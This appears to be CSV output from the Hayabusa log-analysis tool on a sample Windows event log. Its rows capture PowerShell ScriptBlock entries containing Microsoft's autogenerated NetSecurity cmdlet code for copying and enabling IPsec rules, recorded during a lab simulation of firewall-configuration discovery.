-and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewal",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) 
$__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } 
if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'Group",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Component', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') 
